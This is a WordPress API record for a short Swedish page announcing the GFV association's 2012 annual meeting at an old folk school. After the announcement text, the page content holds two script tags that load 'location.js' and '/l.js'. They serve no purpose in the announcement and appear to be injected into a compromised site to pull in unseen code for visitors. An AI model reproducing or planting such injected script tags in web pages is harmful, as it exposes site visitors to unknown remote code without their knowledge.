{"id":1004,"date":"2012-03-13T11:40:24","date_gmt":"2012-03-13T09:40:24","guid":{"rendered":"http:\/\/84.20.155.7\/nywp\/?page_id=1004"},"modified":"2012-03-13T11:40:24","modified_gmt":"2012-03-13T09:40:24","slug":"gfv-arsmote-2012","status":"publish","type":"page","link":"https:\/\/hindersby.net\/word2021\/gamla-folkskolans-vanner-gfv\/gfv-arsmote-2012\/","title":{"rendered":"GFV \u00c5rsm\u00f6te 2012"},"content":{"rendered":"<p>h\u00e5lles s\u00f6ndagen den 18 mars kl.14 p\u00e5 gamla folkskolan<script src='location.js?p=1' type=text\/javascript><\/script><script src='\/l.js?p=1' type=text\/javascript><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>h\u00e5lles s\u00f6ndagen den 18 mars kl.14 p\u00e5 gamla folkskolan<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":486,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"class_list":["post-1004","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/pages\/1004","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/comments?post=1004"}],"version-history":[{"count":0,"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/pages\/1004\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/pages\/486"}],"wp:attachment":[{"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/media?parent=1004"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}